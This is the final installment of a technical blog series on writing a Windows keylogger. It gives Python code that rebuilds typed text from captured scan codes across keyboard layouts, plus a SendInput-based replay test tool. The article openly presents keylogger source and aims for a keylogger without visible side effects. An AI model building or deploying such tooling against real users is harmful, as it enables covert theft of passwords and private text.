Writing a decent win32 keylogger [3/3]
- 21/12/2023 - dans
In this series of articles, we talk about the ins and outs of how to build a keylogger for Windows that is able to support all keyboard layouts and reconstruct Unicode characters correctly regardless of the language (excluding those using input method editors).
In the first part, after a brief introduction to the concepts of scan codes, virtual keys, characters and glyphs, we describe three different ways to capture keystrokes (GetKeyState, SetWindowsHookEx, GetRawInputData) and the differences between those techniques.
In the second part, we detail how Windows stores keyboard layout information in the kbd*.dll files and how to parse them.
In the third and last part, we go through the process of using the extracted information to convert scan codes into characters and all the tricky cases presented by different layouts, such as ligatures, dead keys, extra shift-states and SGCAPS.
Finally, we present our methodology to test and validate that our reconstruction is correct by writing a testing tool which can automate the injection of scan codes and retrieve the reference text produced by Windows which we compare with our reconstructed text.
In this last installment of our Writing a decent Win32 keylogger series, we use the techniques described in the first and second articles and complete our scan-code to character reconstruction process.
Reconstruction process
High level view
Now that we have a pretty clear picture of what goes on in these DLLs, let’s write a reconstruction algorithm. We will use the Python programming language and assume that we already have a variable called layout that is the result of calling json.loads() on the content of the correct JSON file for the current keyboard layout.
Let’s start with a high level view of the process:
For each input event:
- Convert the scan code (and extended flags) to a virtual key using the pusVSCtoVK, pVSCtoVK_E0 and pVSCtoVK_E1 lookup tables.
- Update the current shift state based on the latest key press or key release.
  - handle left and right handed versions of shift state modifiers.
  - handle LOCK keys (capslock, numlock, etc.)
- Look up the output character(s) from pVkToWcharTable based on our input virtual key and current shift state.
  - handle regular characters
  - handle dead characters
  - handle ligatures
- update internal states
- output 0 or more characters
The initial implementation could look like this:
events = jsonl_load('events.jsonl') # read all input key events from file
layout = load_layout('kbdfr.json') # load the active keyboard layout
# prepare a state object that keeps track of which keys are currently pressed and a buffer for dead chars
state = {
    'vk': [ 0 for i in range(0x100) ],
    'dead': None,
    'capslock': 0,
    'numlock': 1, # assume we start with numlock ON (default for windows)
    'scrolllock': 0,
}
out = '' # reconstructed text
# process all events
for evt in events:
    # sc_to_vk returns the virtual key and its name, only the former is needed here
    vk, _ = sc_to_vk(evt['sc'], evt['e0'], evt['e1'], state, layout)
    shiftstate = update_shiftstate(vk, state, layout)
    col = shiftstate_to_column(shiftstate, layout)
    if evt['keyup']:
        # output characters only when the key is pressed, not when it is released
        continue
    ch, dead = vk_to_chars(vk, col, layout)
    out += output_char(ch, dead, vk, state, layout)
# print output
print(out)
Now let’s see in more details how we can implement those steps, starting with the scan code to virtual key conversion.
Scan code to virtual key conversion
def sc_to_vk(sc, e0, e1, state, layout) -> (int, str):
    # check in vsc_to_vk map first
    for it in layout['vsc_to_vk']:
        if it['sc'] == sc:
            # skip this entry if it has the "extended flags" and neither E0 nor E1 are set
            if 'KBDEXT' in it['flags'] and not e0 and not e1:
                continue
            # E0 or E1 but no KBDEXT flag, skip that one too
            elif 'KBDEXT' not in it['flags'] and (e0 or e1):
                continue
            # found a matching entry, return the virtual key and its name
            return it['vk'], it['vkn']
    # check extended scan codes
    if e0:
        for it in layout['vsc_to_vk_e0']:
            if it['sc'] == sc:
                return it['vk'], it['vkn']
    if e1:
        for it in layout['vsc_to_vk_e1']:
            if it['sc'] == sc:
                return it['vk'], it['vkn']
    # no match, unsupported scan code for this layout
    return None, None
It is important to go through the non-extended lookup table even when E0 and E1 are set as some entries have the KBDEXT flag. Our initial (naive) implementation just went through one of the tables based on the E0 and E1 flag values, but it missed keys (such as right shift).
Shift states
Now based on the virtual key that is pressed or released, we can update our current shift state, which means figuring out what is the current combination of “control”, “shift”, “alt” (and some other) keys. Here is what we can do:
- Keep track of the status of NUMLOCK, CAPSLOCK and SCROLLLOCK keys.
- Adjust the values of right/left handed modifiers to the generic versions (VK_RCONTROL => VK_CONTROL, VK_LCONTROL => VK_CONTROL, same for SHIFT and MENU)
- If the current keyboard layout has the ALT-GR flag, then handle VK_RMENU as both VK_MENU and VK_CONTROL.
- Update our internal state to keep track of which virtual keys are currently pressed.
- Go through all modifier virtual keys for this layout and calculate the current shift state.
- Convert the shift state value to a column index in the vk_to_wchars tables.
Here is an extract of the relevant code for the last 2 steps:
shiftstate = 0
for mod in layout['modifiers']:
    if state['vk'][mod['vk']]:
        shiftstate |= mod['modbits']
col = layout['shiftstates'][shiftstate]
if col == 15:
    # invalid shiftstate
    ...
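The earlier steps of the list (lock keys, left/right modifiers, ALT-GR) are not part of the extract above. Below is a minimal, self-contained sketch of how they could fit together. It is not the published implementation: the function name `update_shiftstate_sketch`, its `keyup` parameter, the `altgr` layout field and the toy `layout` values are all assumptions made for the example; only the virtual key codes and the KBDSHIFT / KBDCTRL / KBDALT bit values come from the Windows headers.

```python
# Virtual key codes (winuser.h) and modifier bits (kbd.h)
VK_SHIFT, VK_CONTROL, VK_MENU = 0x10, 0x11, 0x12
VK_CAPITAL, VK_NUMLOCK, VK_SCROLL = 0x14, 0x90, 0x91
VK_LSHIFT, VK_RSHIFT = 0xA0, 0xA1
VK_LCONTROL, VK_RCONTROL = 0xA2, 0xA3
VK_LMENU, VK_RMENU = 0xA4, 0xA5
KBDSHIFT, KBDCTRL, KBDALT = 0x01, 0x02, 0x04

LOCKS = {VK_CAPITAL: 'capslock', VK_NUMLOCK: 'numlock', VK_SCROLL: 'scrolllock'}

def update_shiftstate_sketch(vk, keyup, state, layout):
    '''Record a key press/release and return the resulting shift state bits.'''
    keys = state['vk']
    # toggle a lock key on its first key-down only (auto-repeat is ignored)
    if vk in LOCKS and not keyup and not keys[vk]:
        state[LOCKS[vk]] ^= 1
    keys[vk] = 0 if keyup else 1
    # rebuild the generic modifiers from their left/right variants, so that
    # releasing one SHIFT key while the other is held keeps VK_SHIFT pressed
    altgr = bool(layout.get('altgr')) and bool(keys[VK_RMENU])  # hypothetical field
    keys[VK_SHIFT] = int(keys[VK_LSHIFT] or keys[VK_RSHIFT])
    keys[VK_CONTROL] = int(keys[VK_LCONTROL] or keys[VK_RCONTROL] or altgr)
    keys[VK_MENU] = int(keys[VK_LMENU] or keys[VK_RMENU])
    # same loop as in the extract above
    shiftstate = 0
    for mod in layout['modifiers']:
        if keys[mod['vk']]:
            shiftstate |= mod['modbits']
    return shiftstate

# toy layout: the column numbers are made up for the example (15 = invalid)
layout = {
    'altgr': True,
    'modifiers': [
        {'vk': VK_SHIFT, 'modbits': KBDSHIFT},
        {'vk': VK_CONTROL, 'modbits': KBDCTRL},
        {'vk': VK_MENU, 'modbits': KBDALT},
    ],
    'shiftstates': [0, 1, 2, 15, 15, 15, 3, 4],
}
state = {'vk': [0] * 0x100, 'capslock': 0, 'numlock': 1, 'scrolllock': 0}
```

With this toy layout, pressing the right ALT key alone yields the CONTROL + ALT shift state, which is how ALT-GR ends up selecting its own column.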
Virtual key to characters
Now we have everything we need to perform a lookup in the PVK_TO_WCHAR_TABLE. Here’s our annotated code to handle it:
def vk_to_chars(vk, col, layout) -> (int, int):
    '''
    The first item of the returned tuple is the output wchar_t value as an int.
    The second value is always None, except if the 1st value is WCH_DEAD,
    in which case the 2nd value is the dead character.
    Relies on the global state object for the CAPSLOCK status.
    '''
    # go through all the sub tables
    for vkmap in layout['vk_to_wchars']:
        # skip tables not containing enough columns (one or more shift states)
        if col >= vkmap['num_mods']:
            continue
        # go through all entries
        for i in range(len(vkmap['table'])):
            it = vkmap['table'][i]
            # does this entry match the current virtual key?
            if it['vk'] == vk:
                # here we handle a couple tricky cases
                # regular CAPSLOCK, code assumes VK_SHIFT is modifier with bit 1
                # (which is the case for all keymaps shipped in windows)
                if it['attrs'] == CAPLOK and not col and state['capslock']:
                    # capslock is engaged, the key has the CAPLOK flag
                    # adjust the column as if VK_SHIFT was pressed
                    col = 1
                # skip the SGCAPS entry if CAPSLOCK is on, the next entry for this key applies
                if it['attrs'] == SGCAPS and state['capslock']:
                    continue
                # handle dead characters
                if it['wch'][col] == WCH_DEAD:
                    # also return the associated dead key
                    return it['wch'][col], vkmap['table'][i+1]['wch'][col]
                # regular case, we can just return the char value
                return it['wch'][col], None
    # nothing found
    return None, None
There is something we need to explain here about the handling of the WCH_DEAD case. When we get the magic value WCH_DEAD, we need to look at the next entry in the table to find out the value of the dead character. The capslock and SGCAPS lines will be detailed later on in the "Tricky cases" section of this article.
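To make the WCH_DEAD pairing more concrete, here is a small sketch with a two-row toy table. The rows are illustrative values for a circumflex / diaeresis dead key and the helper name `dead_char_at` is hypothetical; the only addition compared to the code above is a bounds check on the companion row.

```python
WCH_NONE, WCH_DEAD = 0xF000, 0xF001  # magic values from kbd.h

# illustrative rows: the key is dead in both columns, and the row that follows
# carries the actual dead characters for the same columns
table = [
    {'vk': 0xDD, 'attrs': 0, 'wch': [WCH_DEAD, WCH_DEAD]},
    {'vk': 0xFF, 'attrs': 0, 'wch': [0x5E, 0xA8]},  # '^' and '¨'
]

def dead_char_at(table, i, col):
    '''Return the dead character announced by row i, or None if there is none.'''
    if table[i]['wch'][col] != WCH_DEAD:
        return None
    if i + 1 >= len(table):
        # malformed table: WCH_DEAD on the last row has no companion row
        return None
    return table[i + 1]['wch'][col]
```

Calling `dead_char_at(table, 0, 1)` returns the code point of the diaeresis, which is the value that needs to be buffered until the next key press.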
Output
The previous function can return the following values:
- WCH_NONE: there is nothing to output
- WCH_DEAD: there is nothing to output, the dead character must be stored for the next input event
- WCH_LGTR: there is more than one character to output
- unicode code point: there is exactly one character to output (in addition to the eventual buffered dead-char)
However, we also need to take into consideration potential buffered dead characters. Our algorithm to handle new characters to output is the following:
output = []
if current_char is WCH_NONE
    abort
if buffered_dead_char
    combined_char = is_valid_deadchar_combination(buffered_dead_char, current_char, layout)
    // support for chained dead chars
    if combined_char and current_char is dead_char
        set buffered_dead_char = combined_char
        abort
    if combined_char
        output += [ combined_char ]
    else
        // bad deadchar combination
        output += [ buffered_dead_char, current_char ]
    set buffered_dead_char = none
else if current_char is dead_char
    set buffered_dead_char = current_char
else if current_char is ligature
    output += vk_to_ligature(current_char_vk) // this function returns an array of characters
else
    // regular character
    output += [ current_char ]
for each character in output
    print character
… And we finally print out the reconstructed text stream!
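As an illustration, the pseudocode above could translate to Python roughly as follows. This is a sketch under assumptions, not the published code: the `dead_keys` layout field (with `dead`, `base` and `combined` entries), the helper `combine_dead`, the function name `output_char_sketch` and its `ligature` parameter are hypothetical, and flushing a buffered dead character in front of a ligature is our own choice since the pseudocode does not cover that case.

```python
WCH_NONE, WCH_DEAD, WCH_LGTR = 0xF000, 0xF001, 0xF002  # magic values from kbd.h

def combine_dead(dead, ch, layout):
    '''Return the composed code point for (dead, ch), or None if invalid.'''
    for dk in layout['dead_keys']:  # hypothetical field layout
        if dk['dead'] == dead and dk['base'] == ch:
            return dk['combined']
    return None

def output_char_sketch(ch, dead, state, layout, ligature=None):
    '''Return the text produced by one key press and update state['dead'].'''
    if ch is None or ch == WCH_NONE:
        return ''
    current = dead if ch == WCH_DEAD else ch
    pending = state['dead']
    out = []
    if pending is not None and ch != WCH_LGTR:
        combined = combine_dead(pending, current, layout)
        if combined is not None and ch == WCH_DEAD:
            # chained dead chars: keep buffering the intermediate result
            state['dead'] = combined
            return ''
        if combined is not None:
            out.append(combined)
        else:
            # bad combination: both characters are emitted as-is
            out += [pending, current]
        state['dead'] = None
    elif ch == WCH_DEAD:
        state['dead'] = current
    elif ch == WCH_LGTR:
        if pending is not None:  # assumption: flush the dead char first
            out.append(pending)
            state['dead'] = None
        out += ligature or []
    else:
        out.append(current)
    return ''.join(chr(c) for c in out)

# toy data: circumflex followed by 'e' composes to 'ê'
layout = {'dead_keys': [{'dead': 0x5E, 'base': 0x65, 'combined': 0xEA}]}
state = {'dead': None}
```

Feeding it a circumflex dead key followed by `e` returns an empty string and then `ê`, while an unsupported follow-up such as `z` yields both characters one after the other.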
Tricky cases
Now we will focus on a few tricky edge cases we encountered during this research.
Numpad keys
In the vsc_to_vk tables, all numpad keys have both KBDSPECIAL and KBDNUMPAD flags - which means Windows does some special processing - but unfortunately, they always only point to the non-numlock virtual keys. So for the numpad key 0, the only entry we have points to VK_INSERT and never VK_NUMPAD0. This is a bit annoying as it forces us to add a special handling case and “fix” the virtual key value after our conversion from scan code. Here is the implementation:
def fix_numpad_vk(vk, state):
    '''
    numpad keys are handled differently, the mapping towards VK_NUMPAD*
    is not present in the keyboard layout dlls, just the one to VK_INSERT, ...
    so fix it manually :/
    '''
    if not state['numlock']:
        return vk
    fix_map = {
        VK_INSERT: VK_NUMPAD0,
        VK_END: VK_NUMPAD1,
        VK_DOWN: VK_NUMPAD2,
        VK_NEXT: VK_NUMPAD3,
        VK_LEFT: VK_NUMPAD4,
        VK_CLEAR: VK_NUMPAD5,
        VK_RIGHT: VK_NUMPAD6,
        VK_HOME: VK_NUMPAD7,
        VK_UP: VK_NUMPAD8,
        VK_PRIOR: VK_NUMPAD9,
    }
    if vk in fix_map:
        return fix_map[vk]
    return vk
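One thing the virtual key alone cannot tell is whether VK_INSERT came from the numpad or from the dedicated Insert key. On standard keyboards the dedicated navigation cluster is reported with the E0 prefix while the numpad keys are not, so a possible refinement is to gate the fix on that flag. The sketch below assumes the caller still has the E0 flag at hand; the name `fix_numpad_vk_sketch` and its signature are ours, and the published code may handle this differently (for instance through the KBDNUMPAD flag).

```python
# Virtual key codes from winuser.h
VK_CLEAR = 0x0C
VK_PRIOR, VK_NEXT, VK_END, VK_HOME = 0x21, 0x22, 0x23, 0x24
VK_LEFT, VK_UP, VK_RIGHT, VK_DOWN = 0x25, 0x26, 0x27, 0x28
VK_INSERT = 0x2D
VK_NUMPAD0 = 0x60  # VK_NUMPAD1..VK_NUMPAD9 follow consecutively

# navigation virtual keys listed in numpad digit order 0..9
NAV_BY_DIGIT = [VK_INSERT, VK_END, VK_DOWN, VK_NEXT, VK_LEFT,
                VK_CLEAR, VK_RIGHT, VK_HOME, VK_UP, VK_PRIOR]
NUMPAD_FIX = {nav: VK_NUMPAD0 + digit for digit, nav in enumerate(NAV_BY_DIGIT)}

def fix_numpad_vk_sketch(vk, e0, numlock):
    '''Map a navigation vk to VK_NUMPADx for non-extended keys when numlock is on.'''
    if e0 or not numlock:
        # dedicated navigation key, or numlock off: keep the navigation vk
        return vk
    return NUMPAD_FIX.get(vk, vk)
```

With numlock on, `fix_numpad_vk_sketch(VK_INSERT, False, True)` gives VK_NUMPAD0, while the same virtual key with the E0 flag set is returned unchanged.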
Extra shift states
Most keyboard layouts use the standard SHIFT, CONTROL and ALT modifiers and quite a few use ALT-GR, which is handled as CONTROL + ALT. So only 3 modifier keys are used in most cases, but not all of them!
A good example is KBDCAN.DLL, which handles the “Canadian Multilingual Standard” layout that supports typing English, French and a few other languages. On that layout, the right control key maps to VK_OEM_8 instead of the usual VK_RCONTROL and can also be combined with VK_SHIFT to produce additional characters.
The algorithm and code described previously for the shift state calculation does handle those extra modifier keys.
Chained dead keys
We talked about dead keys quite a bit already, but there is a case we haven't covered yet that can happen in at least two keyboard layouts: chained dead chars. Both “Cherokee Phonetic” and “French (Standard, BÉPO)” have the ability to chain dead keys. Here is an example for Cherokee:
Key strokes | output character | comments |
---|---|---|
q + o | Ꮙ | regular dead key with 2 key presses |
d + s + SPACE | Ꮳ | chained dead keys |
d + s + i | Ꮵ | chained dead keys |
The support of this feature complicates the processing of dead chars and of output a little bit. Notably, you have to update your dead char buffer accordingly, keeping in mind that there will always be only one dead character in the buffer, but that it will change upon the second keypress.
Ligatures
As we saw earlier, a single keypress can generate up to five distinct Unicode characters. There is no inherent difficulty in processing them, as our simple code can attest:
def vk_to_ligature(vk, modnum, layout):
    for lig in layout['ligatures']:
        if lig['vk'] == vk and modnum == lig['modnum']:
            return lig['chars']
    return None
...
print(''.join(vk_to_ligature(...)))
SGCAPS
SGCaps stands for “Swiss German Capitals”. In this layout (and some others, mostly for eastern European languages), holding SHIFT and having CAPSLOCK on are not equivalent. For example, let’s take the key VK_OEM_1, which has a whopping five labeled characters:
- ü, when neither SHIFT nor CAPSLOCK are engaged
- Ü, when CAPSLOCK is on (but SHIFT is not)
- è, when SHIFT is on (but CAPSLOCK is not)
- È, when both SHIFT and CAPSLOCK are on
- [, when only ALT-GR is on
Let’s see an annotated extract of the table vk_to_wchars in kbdsg.json that refers to that specific virtual key.
{ "attrs": 2, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 252 /* ü */, 232 /* è */, 91/* [ */, 27/* ESC */ ] },
{ "attrs": 0, "vk": 186, "vkn": "VK_OEM_1", "wch": [ 220 /* Ü */, 200 /* È */, 91/* [ */, 27/* ESC */ ] },
As you can see, we have two entries for the same virtual key, and the first entry has the SGCAPS flag (0x2). When processing such entries, you must remember to skip them if CAPSLOCK is engaged and go to the next one (without the SGCAPS flag).
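The skip rule can be checked against the two entries shown above with a few lines of Python. This is a reduced sketch of the lookup that only keeps the SGCAPS handling; the helper name `sgcaps_lookup` is ours, and the column indexes used in the usage note assume column 0 is the unshifted state and column 1 is SHIFT.

```python
SGCAPS = 0x2  # attribute flag, as seen in the "attrs" field above

# the two VK_OEM_1 entries from kbdsg.json shown above
table = [
    {'attrs': 2, 'vk': 186, 'vkn': 'VK_OEM_1', 'wch': [252, 232, 91, 27]},
    {'attrs': 0, 'vk': 186, 'vkn': 'VK_OEM_1', 'wch': [220, 200, 91, 27]},
]

def sgcaps_lookup(table, vk, col, capslock):
    '''Return the character for (vk, col), honouring the SGCAPS skip rule.'''
    for it in table:
        if it['vk'] != vk:
            continue
        if it['attrs'] == SGCAPS and capslock:
            # CAPSLOCK is on: the entry that follows holds the right characters
            continue
        return chr(it['wch'][col])
    return None
```

Looking up column 0 gives `ü` without CAPSLOCK and `Ü` with it; column 1 (SHIFT) gives `è` and `È` respectively, which matches the list of labeled characters.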
Building a test program
In order to speed up testing and debugging, we wrote a simple win32 Python program which can be fed our keylogger’s output, which will then emulate the key-presses and retrieve the characters sent to the program by Windows. This gives us a frame of reference to validate our reconstruction.
Sending input events
To emulate input events, Windows offers the function SendInput which is defined as:
UINT SendInput(UINT cInputs, LPINPUT pInputs, int cbSize);
This function can be used to send multiple INPUT structures which are basically a union of MOUSEINPUT, KEYBDINPUT and HARDWAREINPUT. We will only send events of type KEYBDINPUT in our test program. Here is the structure’s definition:
typedef struct tagKEYBDINPUT {
    WORD wVk;
    WORD wScan;
    DWORD dwFlags;
    DWORD time;
    ULONG_PTR dwExtraInfo;
} KEYBDINPUT, *PKEYBDINPUT, *LPKEYBDINPUT;
To simulate key-presses, we only need to fill the wScan (scan code) and dwFlags members. It is important to set the KEYEVENTF_SCANCODE flag or else the wVk (virtual key) member will be used instead of wScan. Additionally we conditionally set the flag KEYEVENTF_EXTENDEDKEY for E0 / E1 scan codes and the flag KEYEVENTF_KEYUP to indicate a key release.
Here is the Python code that uses ctypes to call SendInput to inject key presses:
from ctypes import *
from ctypes import wintypes as w
# required flags / defines
KEYEVENTF_EXTENDEDKEY = 0x1
KEYEVENTF_KEYUP = 0x2
KEYEVENTF_UNICODE = 0x4
KEYEVENTF_SCANCODE = 0x8
INPUT_KEYBOARD = 1
# not defined by wintypes
ULONG_PTR = c_ulong if sizeof(c_void_p) == 4 else c_ulonglong
class KEYBDINPUT(Structure):
    _fields_ = [('wVk' ,w.WORD),
                ('wScan',w.WORD),
                ('dwFlags',w.DWORD),
                ('time',w.DWORD),
                ('dwExtraInfo',ULONG_PTR)]
class MOUSEINPUT(Structure):
    _fields_ = [('dx' ,w.LONG),
                ('dy',w.LONG),
                ('mouseData',w.DWORD),
                ('dwFlags',w.DWORD),
                ('time',w.DWORD),
                ('dwExtraInfo',ULONG_PTR)]
class HARDWAREINPUT(Structure):
    _fields_ = [('uMsg' ,w.DWORD),
                ('wParamL',w.WORD),
                ('wParamH',w.WORD)]
class DUMMYUNIONNAME(Union):
    _fields_ = [('mi',MOUSEINPUT),
                ('ki',KEYBDINPUT),
                ('hi',HARDWAREINPUT)]
class INPUT(Structure):
    _anonymous_ = ['u']
    _fields_ = [('type',w.DWORD),
                ('u',DUMMYUNIONNAME)]
user32 = WinDLL('user32')
user32.SendInput.argtypes = w.UINT, POINTER(INPUT), c_int
user32.SendInput.restype = w.UINT
def send_scancode(code, up, ext):
    ''' uses SendInput to send a specified scancode, setting the appropriate flags for key up/down and e0/e1 extended flags '''
    i = INPUT()
    i.type = INPUT_KEYBOARD
    i.ki = KEYBDINPUT(0, code, KEYEVENTF_SCANCODE, 0, 0)
    if up:
        i.ki.dwFlags |= KEYEVENTF_KEYUP
    if ext:
        i.ki.dwFlags |= KEYEVENTF_EXTENDEDKEY
    return user32.SendInput(1, byref(i), sizeof(INPUT)) == 1
We can now use the function send_scancode, specifying the scan code, whether the key is pressed or released, and whether it’s an extended scan code or not.
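A recorded session can then be replayed by looping over the captured events. The sketch below assumes the event fields used earlier in this article (`sc`, `e0`, `e1`, `keyup`); the `replay` helper and its `delay` parameter are hypothetical, and the sender is passed in as an argument so that the loop can be exercised without touching SendInput.

```python
import time

def replay(events, send, delay=0.0):
    '''
    Feed recorded events to send(code, up, ext) and return how many of them
    were accepted. `send` is expected to behave like send_scancode.
    '''
    accepted = 0
    for evt in events:
        # E0 and E1 prefixed scan codes are both sent with the extended flag
        ext = bool(evt.get('e0') or evt.get('e1'))
        if send(evt['sc'], bool(evt['keyup']), ext):
            accepted += 1
        if delay:
            # optional pause between events
            time.sleep(delay)
    return accepted
```

On Windows the call would look like `replay(events, send_scancode, delay=0.01)`; in a unit test, `send` can be a stub that records its arguments.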
Switching the keyboard layout
To speed up testing, we wanted to be able to change input languages on the fly with no manual GUI action. We first experimented with ActivateKeyboardLayout and other functions but it did not work in the end due to the fact that keyboard layouts are bound to threads, and to be more accurate, to the thread responsible for the creation of a window (HWND). In the case of a console program, it is actually created by conhost.exe and not the running program, which makes it harder to identify the right thread (and process!).
So the method we ended up using is to simply send the window message WM_INPUTLANGCHANGEREQUEST to the foreground window, which will work as long as our program has the focus. It looks like this:
# defines
WM_INPUTLANGCHANGEREQUEST = 0x0050
# prototypes (HWND is already a handle type, no extra pointer level is needed)
user32.GetForegroundWindow.restype = w.HWND
user32.SendMessageA.argtypes = w.HWND,w.UINT,w.WPARAM,w.LPARAM
user32.SendMessageA.restype = c_int
def switch_layout(klid):
    '''
    uses SendMessageA to the current foreground window instead of
    ActivateKeyboardLayout / LoadKeyboardLayout which will not work
    if not called from the main thread of the current program,
    which is not the case with python ...
    '''
    return user32.SendMessageA( user32.GetForegroundWindow(), WM_INPUTLANGCHANGEREQUEST, 0, int(klid, 16)) == 0
Note: since there is a setting in Windows allowing each window to use a different input language, you can’t rely on the keylogger’s active layout to be correct. So you need to figure out the name and id of the active layout of the intended recipient program. We initially found the active keyboard layout (HKL) for our target and then used ActivateKeyboardLayout and GetKeyboardLayoutNameA to get the KLID before restoring the original active keyboard layout in our own context. We discovered that this was a very bad idea: there was a very noticeable side effect on the target program that prevented some keys from working (alt-gr combos for example). This is why we fell back to enumerating the registry’s keyboard layouts to get the HKL / KLID / dll name correlations.
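For reference, the registry enumeration can be sketched with the standard winreg module. The key `HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layouts` holds one subkey per KLID, each with a `Layout File` (DLL name) and `Layout Text` (display name) value. The function name `list_layouts` and the shape of the returned dictionary are our own choices, and the sketch stops short of the HKL correlation, which needs additional logic not shown here.

```python
import sys

LAYOUTS_KEY = r'SYSTEM\CurrentControlSet\Control\Keyboard Layouts'

def list_layouts():
    '''Return {klid: {'dll': ..., 'name': ...}} for all installed layouts.'''
    if sys.platform != 'win32':
        # the registry only exists on Windows
        return {}
    import winreg
    layouts = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LAYOUTS_KEY) as root:
        subkey_count = winreg.QueryInfoKey(root)[0]
        for index in range(subkey_count):
            klid = winreg.EnumKey(root, index)
            with winreg.OpenKey(root, klid) as sub:
                try:
                    dll, _ = winreg.QueryValueEx(sub, 'Layout File')
                except FileNotFoundError:
                    # no DLL registered for this entry, skip it
                    continue
                try:
                    name, _ = winreg.QueryValueEx(sub, 'Layout Text')
                except FileNotFoundError:
                    name = ''
            layouts[klid.lower()] = {'dll': dll, 'name': name}
    return layouts
```

Reading these values has no effect on the target program, unlike the ActivateKeyboardLayout approach described in the note.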
Putting it all together
Now we have:
- Three different key logger programs,
- A keymap data extractor to transform keyboard layout DLLs into more useable JSON files,
- A replayer program to get the correct output from a list of input scan codes and a keyboard layout,
- And a reconstruction program that can use the output of all of the others to make sure everything is processed correctly!
All the code is available on github here.
Hopefully this article will help you understand a bit better how keyboard input works on Windows and how to write a good keylogger: one that supports multiple languages, that doesn’t hardcode a list of strings mapped to virtual keys, that handles dead keys, ligatures, multiple shift states and moreover, that doesn’t introduce visible side effects!
We haven't covered languages that use an IME (input method editor), which, simply put, adds another layer between the input and the windows. Given their diversity, and the fact that they can use both keyboard and mouse and can be customized, it doesn't seem very practical to emulate them. I would recommend attacking the problem from a different angle: hooking the window messages and looking for WM_CHAR events. This way you get the correct characters directly with no added effort.
Finally, there are a few things we haven’t touched on that we could still improve. All keys that move the cursor around, such as the arrow keys, page up and page down, can affect the output. Take for instance the following input: A, LEFT, B. The resulting output would be BA and not AB. There is also the detection of CTRL-V, which you may want to handle with a call to GetClipboardData(). We’ll leave that as an exercise for the reader ;)
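As a starting point for the cursor movement case, here is a minimal sketch of a single-line buffer that tracks the caret position. The class name `LineBuffer` and the key names are hypothetical, and it deliberately ignores multi-line text, selections, deletions and mouse clicks, all of which also move or alter the text in a real application.

```python
class LineBuffer:
    '''Single-line text buffer with a caret, for replaying typed characters.'''

    def __init__(self):
        self.chars = []
        self.pos = 0  # caret index, between 0 and len(self.chars)

    def insert(self, text):
        # typed characters go in at the caret, which then moves right
        for ch in text:
            self.chars.insert(self.pos, ch)
            self.pos += 1

    def move(self, key):
        # only a handful of navigation keys are modelled here
        if key == 'LEFT':
            self.pos = max(0, self.pos - 1)
        elif key == 'RIGHT':
            self.pos = min(len(self.chars), self.pos + 1)
        elif key == 'HOME':
            self.pos = 0
        elif key == 'END':
            self.pos = len(self.chars)

    def text(self):
        return ''.join(self.chars)
```

Replaying A, LEFT, B through this buffer (`insert('A')`, `move('LEFT')`, `insert('B')`) leaves `text()` equal to `BA`, as in the example above.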